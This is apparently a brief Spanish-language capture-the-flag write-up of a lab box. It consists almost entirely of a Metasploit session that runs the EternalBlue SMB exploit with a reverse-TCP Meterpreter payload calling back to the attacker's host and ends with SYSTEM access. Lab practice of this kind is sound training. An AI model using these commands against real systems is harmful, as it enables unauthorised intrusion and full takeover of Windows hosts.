Está estuvo facílisima, creo que le voy agarrando la onda.
msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40 msf exploit(windows/smb/ms17_010_eternalblue) > set lhost tun0 lhost => tun0 msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 10.10.14.9:4444 [*] 10.10.10.40:445 - Connecting to target for exploitation. [+] 10.10.10.40:445 - Connection established for exploitation. [+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply [*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes) [*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes [*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv [*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1 [+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations. [*] 10.10.10.40:445 - Sending all but last fragment of exploit packet [*] Sending stage (179779 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.4:1055) at 2018-05-29 12:58:58 +0100 [-] 10.10.10.40:445 - TypeError [-] 10.10.10.40:445 - nil can't be coerced into Fixnum [-] 10.10.10.40:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/dispatcher/socket.rb:32:in `+' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/dispatcher/socket.rb:32:in `send_packet' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:228:in `send_recv' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client/echo.rb:17:in `smb1_echo' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:152:in `echo' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:342:in `smb1_large_buffer' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:196:in `smb_eternalblue' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:118:in `block in exploit' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.10/lib/active_support/core_ext/range/each.rb:7:in `each' /usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.10/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone' /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:114:in `exploit' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc' /usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple' /usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:548:in `run_command' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:510:in `block in run_single' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `each' /usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:504:in `run_single' /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:206:in `run' /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start' /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start' /usr/bin/msfconsole:48:in `<main>' meterpreter > getuid Server username: NT AUTHORITY\SYSTEM